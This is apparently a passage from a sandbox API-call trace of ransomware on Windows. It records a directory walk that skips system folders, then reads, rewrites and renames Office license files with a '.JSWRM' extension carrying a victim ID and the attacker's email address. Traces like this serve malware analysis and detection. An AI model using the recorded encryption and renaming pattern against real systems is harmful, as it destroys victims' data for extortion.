[0112.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0112.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0112.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0112.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0112.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.144] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0112.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0112.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0112.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0112.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0112.145] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xece51a0a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xece51a0a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecf5ca1c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x297f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Retail-pl.xrm-ms", cAlternateFileName="WO8BF8~1.XRM")) returned 1 [0112.145] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0112.145] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0112.145] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0112.145] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="windows") returned 1 [0112.145] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0112.146] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.146] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.146] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.146] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.146] lstrcmpiW (lpString1="WordR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0112.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x240f98, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0112.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0112.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x2413a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0112.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0112.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0112.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0112.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.147] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10623) returned 1 [0112.147] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2970) returned 0x24c1d0 [0112.147] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2970, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2970, lpOverlapped=0x0) returned 1 [0112.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.149] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2970, lpOverlapped=0x0) returned 1 [0112.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.149] CloseHandle (hObject=0x45c) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0112.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0112.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0112.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0112.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0112.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0112.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0112.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0112.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0112.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0112.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0112.150] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecff5399, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecff5399, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed0da264, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x510e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Retail-ppd.xrm-ms", cAlternateFileName="WO466B~1.XRM")) returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="windows") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.151] lstrcmpiW (lpString1="WordR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0112.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0112.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0112.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0112.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0112.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0112.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.152] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20750) returned 1 [0112.152] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5100) returned 0x24c1d0 [0112.152] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5100, lpOverlapped=0x0) returned 1 [0112.155] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.155] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5100, lpOverlapped=0x0) returned 1 [0112.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.155] CloseHandle (hObject=0x45c) returned 1 [0112.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0112.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0112.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0112.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0112.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0112.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0112.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.156] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0112.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0112.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0112.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0112.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.157] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecd6cbe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecd6cbe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed01b5ef, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Retail-ul-oob.xrm-ms", cAlternateFileName="WORDR_~4.XRM")) returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="windows") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.157] lstrcmpiW (lpString1="WordR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0112.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241290, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0112.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Retail-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0112.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0112.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0112.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0112.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.158] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11569) returned 1 [0112.158] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0112.158] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0112.161] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.161] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0112.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.161] CloseHandle (hObject=0x45c) returned 1 [0112.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0112.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: 